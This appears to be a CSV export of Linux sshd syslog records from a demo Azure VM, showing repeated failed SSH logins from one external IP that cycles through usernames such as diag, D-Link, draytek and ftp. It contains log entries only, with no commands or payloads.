+2569,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:16:50,UbuntuDevEnv,2019-06-28 05:16:49,auth,UbuntuDevEnv,info,Invalid user diag from 193.201.224.232 port 32789,93537,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,diag,193.201.224.2,32789,,
+2570,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:16:50,UbuntuDevEnv,2019-06-28 05:16:49,auth,UbuntuDevEnv,info,Failed none for invalid user diag from 193.201.224.232 port 32789 ssh2,93537,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,diag,193.201.224.2,32789,,
+2571,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:16:50,UbuntuDevEnv,2019-06-28 05:16:49,auth,UbuntuDevEnv,info,"Disconnecting invalid user diag 193.201.224.232 port 32789: Change of username or service not allowed: (diag,ssh-connection) -> (disttech,ssh-connection) [preauth]",93537,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,diag,193.201.224.2,32789,,
+2572,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:16:54,UbuntuDevEnv,2019-06-28 05:16:54,auth,UbuntuDevEnv,info,Invalid user disttech from 193.201.224.232 port 35311,93559,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,disttech,193.201.224.2,35311,,
+2573,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:16:54,UbuntuDevEnv,2019-06-28 05:16:54,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,93559,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2574,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:16:54,UbuntuDevEnv,2019-06-28 05:16:54,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,93559,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2575,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:16:56,UbuntuDevEnv,2019-06-28 05:16:56,auth,UbuntuDevEnv,info,Failed password for invalid user disttech from 193.201.224.232 port 35311 ssh2,93559,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,disttech,193.201.224.2,35311,,
+2576,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:16:56,UbuntuDevEnv,2019-06-28 05:16:56,auth,UbuntuDevEnv,info,"Disconnecting invalid user disttech 193.201.224.232 port 35311: Change of username or service not allowed: (disttech,ssh-connection) -> (D-Link,ssh-connection) [preauth]",93559,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,disttech,193.201.224.2,35311,,
+2577,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:17:23,UbuntuDevEnv,2019-06-28 05:17:22,auth,UbuntuDevEnv,info,Invalid user D-Link from 193.201.224.232 port 47318,93634,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,D,193.201.224.2,47318,,
+2578,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:17:23,UbuntuDevEnv,2019-06-28 05:17:22,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,93634,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2579,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:17:23,UbuntuDevEnv,2019-06-28 05:17:22,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,93634,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2580,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:17:25,UbuntuDevEnv,2019-06-28 05:17:25,auth,UbuntuDevEnv,info,Failed password for invalid user D-Link from 193.201.224.232 port 47318 ssh2,93634,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,D,193.201.224.2,47318,,
+2581,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:17:25,UbuntuDevEnv,2019-06-28 05:17:25,auth,UbuntuDevEnv,info,"Disconnecting invalid user D-Link 193.201.224.232 port 47318: Change of username or service not allowed: (D-Link,ssh-connection) -> (draytek,ssh-connection) [preauth]",93634,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,D,193.201.224.2,47318,,
+2582,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:17:31,UbuntuDevEnv,2019-06-28 05:17:31,auth,UbuntuDevEnv,info,Invalid user draytek from 193.201.224.232 port 19092,93681,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,draytek,193.201.224.2,19092,,
+2583,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:17:31,UbuntuDevEnv,2019-06-28 05:17:31,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,93681,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2584,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:17:31,UbuntuDevEnv,2019-06-28 05:17:31,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,93681,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2585,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:17:33,UbuntuDevEnv,2019-06-28 05:17:33,auth,UbuntuDevEnv,info,Failed password for invalid user draytek from 193.201.224.232 port 19092 ssh2,93681,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,draytek,193.201.224.2,19092,,
+2586,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:17:34,UbuntuDevEnv,2019-06-28 05:17:33,auth,UbuntuDevEnv,info,"Disconnecting invalid user draytek 193.201.224.232 port 19092: Change of username or service not allowed: (draytek,ssh-connection) -> (dvs,ssh-connection) [preauth]",93681,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,draytek,193.201.224.2,19092,,
+2587,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:17:35,UbuntuDevEnv,2019-06-28 05:17:34,auth,UbuntuDevEnv,info,Invalid user dvs from 193.201.224.232 port 42515,93712,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dvs,193.201.224.2,42515,,
+2588,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:17:35,UbuntuDevEnv,2019-06-28 05:17:34,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,93712,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2589,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:17:35,UbuntuDevEnv,2019-06-28 05:17:34,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,93712,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2590,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:17:37,UbuntuDevEnv,2019-06-28 05:17:37,auth,UbuntuDevEnv,info,Failed password for invalid user dvs from 193.201.224.232 port 42515 ssh2,93712,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dvs,193.201.224.2,42515,,
+2591,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:17:38,UbuntuDevEnv,2019-06-28 05:17:37,auth,UbuntuDevEnv,info,"Disconnecting invalid user dvs 193.201.224.232 port 42515: Change of username or service not allowed: (dvs,ssh-connection) -> (e250,ssh-connection) [preauth]",93712,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dvs,193.201.224.2,42515,,
+2592,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:17:38,UbuntuDevEnv,2019-06-28 05:17:38,auth,UbuntuDevEnv,info,Invalid user e250 from 193.201.224.232 port 46425,93731,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,e250,193.201.224.2,46425,,
+2593,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:17:40,UbuntuDevEnv,2019-06-28 05:17:39,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,93731,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2594,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:17:40,UbuntuDevEnv,2019-06-28 05:17:39,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,93731,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2595,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:17:41,UbuntuDevEnv,2019-06-28 05:17:41,auth,UbuntuDevEnv,info,Failed password for invalid user e250 from 193.201.224.232 port 46425 ssh2,93731,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,e250,193.201.224.2,46425,,
+2596,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:17:43,UbuntuDevEnv,2019-06-28 05:17:42,auth,UbuntuDevEnv,info,"Disconnecting invalid user e250 193.201.224.232 port 46425: Change of username or service not allowed: (e250,ssh-connection) -> (echo,ssh-connection) [preauth]",93731,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,e250,193.201.224.2,46425,,
+2597,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:17:44,UbuntuDevEnv,2019-06-28 05:17:43,auth,UbuntuDevEnv,info,Invalid user echo from 193.201.224.232 port 14929,93748,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,echo,193.201.224.2,14929,,
+2598,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:17:44,UbuntuDevEnv,2019-06-28 05:17:43,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,93748,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2599,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:17:44,UbuntuDevEnv,2019-06-28 05:17:43,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,93748,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2600,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:17:46,UbuntuDevEnv,2019-06-28 05:17:45,auth,UbuntuDevEnv,info,Failed password for invalid user echo from 193.201.224.232 port 14929 ssh2,93748,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,echo,193.201.224.2,14929,,
+2601,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:17:46,UbuntuDevEnv,2019-06-28 05:17:45,auth,UbuntuDevEnv,info,"Disconnecting invalid user echo 193.201.224.232 port 14929: Change of username or service not allowed: (echo,ssh-connection) -> (engineer,ssh-connection) [preauth]",93748,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,echo,193.201.224.2,14929,,
+2602,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:17:46,UbuntuDevEnv,2019-06-28 05:17:46,auth,UbuntuDevEnv,info,Invalid user engineer from 193.201.224.232 port 19373,93757,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,engineer,193.201.224.2,19373,,
+2603,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:17:47,UbuntuDevEnv,2019-06-28 05:17:46,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,93757,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2604,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:17:47,UbuntuDevEnv,2019-06-28 05:17:46,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,93757,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2605,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:17:49,UbuntuDevEnv,2019-06-28 05:17:48,auth,UbuntuDevEnv,info,Failed password for invalid user engineer from 193.201.224.232 port 19373 ssh2,93757,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,engineer,193.201.224.2,19373,,
+2606,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:17:49,UbuntuDevEnv,2019-06-28 05:17:49,auth,UbuntuDevEnv,info,"Disconnecting invalid user engineer 193.201.224.232 port 19373: Change of username or service not allowed: (engineer,ssh-connection) -> (enrique,ssh-connection) [preauth]",93757,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,engineer,193.201.224.2,19373,,
+2607,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:17:52,UbuntuDevEnv,2019-06-28 05:17:51,auth,UbuntuDevEnv,info,Invalid user enrique from 193.201.224.232 port 25270,93779,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,enrique,193.201.224.2,25270,,
+2608,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:17:52,UbuntuDevEnv,2019-06-28 05:17:51,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,93779,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2609,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:17:52,UbuntuDevEnv,2019-06-28 05:17:51,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,93779,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2610,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:17:53,UbuntuDevEnv,2019-06-28 05:17:53,auth,UbuntuDevEnv,info,Failed password for invalid user enrique from 193.201.224.232 port 25270 ssh2,93779,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,enrique,193.201.224.2,25270,,
+2611,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:17:54,UbuntuDevEnv,2019-06-28 05:17:53,auth,UbuntuDevEnv,info,"Disconnecting invalid user enrique 193.201.224.232 port 25270: Change of username or service not allowed: (enrique,ssh-connection) -> (fax,ssh-connection) [preauth]",93779,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,enrique,193.201.224.2,25270,,
+2612,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:17:57,UbuntuDevEnv,2019-06-28 05:17:57,auth,UbuntuDevEnv,info,Invalid user fax from 193.201.224.232 port 31316,93793,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,fax,193.201.224.2,31316,,
+2613,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:17:58,UbuntuDevEnv,2019-06-28 05:17:57,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,93793,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2614,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:17:58,UbuntuDevEnv,2019-06-28 05:17:57,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,93793,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2615,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:18:00,UbuntuDevEnv,2019-06-28 05:18:00,auth,UbuntuDevEnv,info,Failed password for invalid user fax from 193.201.224.232 port 31316 ssh2,93793,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,fax,193.201.224.2,31316,,
+2616,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:18:01,UbuntuDevEnv,2019-06-28 05:18:00,auth,UbuntuDevEnv,info,"Disconnecting invalid user fax 193.201.224.232 port 31316: Change of username or service not allowed: (fax,ssh-connection) -> (ftp,ssh-connection) [preauth]",93793,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,fax,193.201.224.2,31316,,
+2617,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:18:01,UbuntuDevEnv,2019-06-28 05:18:01,auth,UbuntuDevEnv,info,Invalid user ftp from 193.201.224.232 port 63992,93811,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftp,193.201.224.2,63992,,
+2618,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:18:01,UbuntuDevEnv,2019-06-28 05:18:01,auth,UbuntuDevEnv,info,Failed none for invalid user ftp from 193.201.224.232 port 63992 ssh2,93811,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftp,193.201.224.2,63992,,
+2619,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:18:01,UbuntuDevEnv,2019-06-28 05:18:01,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,93811,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2620,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:18:01,UbuntuDevEnv,2019-06-28 05:18:01,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,93811,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2621,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:18:03,UbuntuDevEnv,2019-06-28 05:18:03,auth,UbuntuDevEnv,info,Failed password for invalid user ftp from 193.201.224.232 port 63992 ssh2,93811,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftp,193.201.224.2,63992,,
+2622,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:18:04,UbuntuDevEnv,2019-06-28 05:18:03,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,93811,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2623,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:18:05,UbuntuDevEnv,2019-06-28 05:18:05,auth,UbuntuDevEnv,info,Failed password for invalid user ftp from 193.201.224.232 port 63992 ssh2,93811,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftp,193.201.224.2,63992,,
+2624,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:18:07,UbuntuDevEnv,2019-06-28 05:18:06,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,93811,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2625,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:18:09,UbuntuDevEnv,2019-06-28 05:18:09,auth,UbuntuDevEnv,info,Failed password for invalid user ftp from 193.201.224.232 port 63992 ssh2,93811,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftp,193.201.224.2,63992,,
+2626,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:18:09,UbuntuDevEnv,2019-06-28 05:18:09,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,93811,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2627,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:18:12,UbuntuDevEnv,2019-06-28 05:18:11,auth,UbuntuDevEnv,info,Failed password for invalid user ftp from 193.201.224.232 port 63992 ssh2,93811,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftp,193.201.224.2,63992,,
